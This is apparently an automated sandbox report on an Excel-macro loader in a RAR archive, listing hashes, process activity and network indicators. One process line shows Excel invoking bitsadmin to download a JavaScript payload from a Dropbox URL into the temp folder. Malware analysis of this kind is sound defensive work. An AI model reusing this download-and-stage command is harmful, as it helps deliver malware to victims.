analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

malware test.rar

Full analysis: https://app.any.run/tasks/86b2ad99-f87c-49c6-be6b-a9f73d48327c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 14, 2018, 12:56:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

7760674AEEA00F749945983D86121163

SHA1:

0161F23A57CE1102A52BC4C1142C70E6E7412C00

SHA256:

1CCA48A3F0E7C213616FEE44C1E46BB0A1C10882482D360F6ECAB41D57F68F51

SSDEEP:

768:zyllVOxpOXo6iOVLNcYiIU5af79fN52cq3Sm0799K7wXbXFsPwHLiN:zEHXPVpcAa29fN4l/G99nDF14

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3176)
    • Uses BITADMIN.EXE for downloading application

      • EXCEL.EXE (PID: 3176)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2948)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3176)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs excel.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\malware test.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3176"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
4060"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal https://uc0591a320d160667a462aba1f79.dl.dropboxusercontent.com/cd/0/get/AXWQQJtYvZWFT9i1j67OK7Dp2Z2AIP17Z6z8yZaF9cz2wFDwo2OHhy00HTYcw3ZyHrZNRT_cLGrNZRyEp2JqyV2ikb2ktCVFozG2KsPMGc62mdaOZjLwDOdTgfPBU1Kv5XJT7X_k39osaUZxi4jyMVZkg-u2ZqrJk8vL7JuPZWqOUXXqnhIMfzLqD3oqT1uqffE/file?_download_id=146823788745195971311289563970759894616885561912331378870261079594&_notify_domain=www.dropbox.com&dl=1.js C:\Users\admin\AppData\Local\Temp\\pepe.jsC:\Windows\System32\bitsadmin.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149122452
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
1 039
Read events
998
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3176EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRD13E.tmp.cvr
MD5:
SHA256:
2948WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb2948.21187\malware test.xlsmdocument
MD5:CFFA981CC5BE4B0AAEF02401A0004AD2
SHA256:EAC441CFEF215D6DD3E81B0616F9758C820AE7E6BD3BDA967C3F5FCDD3947914
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
162.125.66.6:443
uc0591a320d160667a462aba1f79.dl.dropboxusercontent.com
Dropbox, Inc.
DE
shared

DNS requests

Domain
IP
Reputation
uc0591a320d160667a462aba1f79.dl.dropboxusercontent.com
  • 162.125.66.6
malicious

Threats

No threats detected
No debug info